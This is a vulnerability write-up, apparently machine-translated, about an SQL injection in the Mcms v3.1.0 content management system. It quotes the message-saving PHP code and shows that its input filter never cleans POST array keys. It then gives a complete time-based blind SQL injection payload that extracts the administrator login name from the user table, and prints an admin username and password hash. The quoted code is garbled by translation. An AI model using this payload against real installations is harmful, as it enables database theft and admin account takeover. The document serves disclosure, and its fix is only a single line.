Mcms latest SQL Injection package (any data can be output)

Mcms latest SQL Injection package (any data can be output)

Mcms latest SQL Injection package (any data can be output)

On wooyun, we can see that zhangyi technology no longer ignores vulnerabilities. Let's join in. Go to the latest version of mcms (v_3.1.0.enterprise) for research.

Inject one: POST/app/message /? M = save_message post has this parameter. Although it has been filtered by xss and SQL, it is not completely filtered. Let's take a look at how to inject it.

Check the code/app/message/index. php

Function m _ save_message () {global $ dbm, $ C, $ V; $ _ POST = H: sqlxss ($ _ POST); $ model_fields = array (); foreach ($ _ POST as $ k => $ v) {if (substr ($ k,) = 'extern ___') {// fill in the extended table field $ model_fields [substr ($ k, 9)] = $ v ;}} // determine the extended model table form $ C-> verify_model_form ('message', $ model_fields); $ model_fields ['create _ time'] = time (); $ dbm-> single_insert (TB_PRE. 'message', $ model_fields, 1); die ('{"code": 0, "msg": "message succeeded "}');}

The Post content is filtered to see how sqlxss () is implemented.

public static function sqlxss($input){    if(is_array($input)){        foreach($input as $k=>$v){            $input[$k]=H::sqlxss($v);        }    }else{        $input=H::escape($input,1);        $input=htmlspecialchars($input,ENT_QUOTES);    }    return $input;}

Use H: escape to filter user input content and htmlspecialchars to filter the content. Let's take a look at H: escape.

Public static function escape ($ input, $ urldecode = 0) {if (is_array ($ input) {foreach ($ input as $ k => $ v) {$ input [$ k] = H: escape ($ v, $ urldecode) ;}} else {$ input = trim ($ input ); if ($ urldecode = 1) {$ input = str_replace (array ('+'), array ('{addplus}'), $ input ); $ input = urldecode ($ input); $ input = str_replace (array ('{addplus}'), array ('+'), $ input );} // if (strnatcasecmp (PHP_VERSION, '5. 4.0 ')> = 0) {$ input = addslashes ($ input);} else {// if (! Get_magic_quotes_gpc () {$ input = addslashes ($ input) ;}}// prevents SQL errors caused by the last backslash, such as 'abc \ 'if (substr ($ input, -) = '\') $ input = $ input. "'"; // $ input = substr ($ input, 0, strlen ($ input)-1); return $ input ;}

The user's input is completely filtered, but it is ignored here, that is, the KEY is not filtered, resulting in injection.

Payload: POST submission

extern___true_name`)values(''/**/or(select/**/if(ord(mid((select/**/login_name/**/from/**/mcms_user/**/limit/**/0,1),1,1))%3d108,sleep(1),0))or'')#=test&extern___phone=13511111111&extern___content=test

Because it is time-based blind injection, When you guess the first letter of the administrator user name, if the error occurs, the delay is about 2 seconds, such
 

If it is correct, the delay is about 3 seconds, as shown in figure
 

Follow the steps above (burp intruder or write a script to run it yourself). The user name of the test administrator is mcmsadmin and the password is f6fdffe48c908deb0f4c3bd36c032e72.

Solution:

Filter keys